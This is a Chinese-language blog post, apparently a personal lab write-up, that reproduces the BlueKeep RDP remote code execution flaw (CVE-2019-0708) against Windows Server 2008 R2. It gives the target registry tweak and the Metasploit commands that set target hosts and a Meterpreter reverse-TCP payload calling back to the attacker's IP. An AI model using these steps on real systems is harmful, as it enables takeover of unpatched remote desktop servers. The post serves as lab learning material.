CVE-2019-0708 远程桌面代码执行漏洞Windows Server 2008复现 - JunMo博客

JunMo的博客

2019
记录生活
首页 » KALI » CVE-2019-0708 远程桌面代码执行漏洞Windows Server 2008复现

CVE-2019-0708 远程桌面代码执行漏洞Windows Server 2008复现

0x01前言

复现完了win7,在来水一篇复现2008的,虽然比较鸡肋。

0x02环境

这里我使用的是 Microsoft Windows Server 2008 R2 Enterprise 

依旧开启3389关闭防火墙

0x03复现

首先要修改注册表HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Terminal Server\WinStations\RDP-Tcp\fDisableCam为 0(好鸡肋啊!!!) 不修改的话我测试都是蓝屏

然后启动msf使用模块(没有配置模块的可以看看我前面的文章)

use exploit/rdp/cve_2019_0708_bluekeep_rce

然后配置参数

set RDP_CLIENT_IP 192.168.0.121 //设置自己的ip

set RHOSTS 192.168.0.116 //设置靶机ip

set target 1//设置1

set payload windows/x64/meterpreter/reverse_tcp //设置payload

set lhost 192.168.0.121 //设置自己的ip


小火车启动嘟嘟嘟

复现成功。

文章如无特别注明均为原创!
本文作者: JunMo
转载或复制请带上本文地址 http://mo60.cn/post-63.html
并注明出处 JunMo博客
原文地址《 CVE-2019-0708 远程桌面代码执行漏洞Windows Server 2008复现
发布于2019-9-11
收录状态: [百度已收录][360未收录]

分享到:


打赏

评论

游客

看不清楚?点图切换

  1. #3
    qq_avatar

    太难了

    Qing 4周前 (2019-11-11)回复
  2. #2
    qq_avatar

    孤辰 1个月前 (2019-10-24)回复
  3. #1
    qq_avatar

    中秋节快乐吖~
    欢迎回访^_^

    发自:偏锋博客

    偏锋博客 3个月前 (2019-09-13)回复
切换注册

登录

您也可以使用第三方帐号快捷登录

切换登录

注册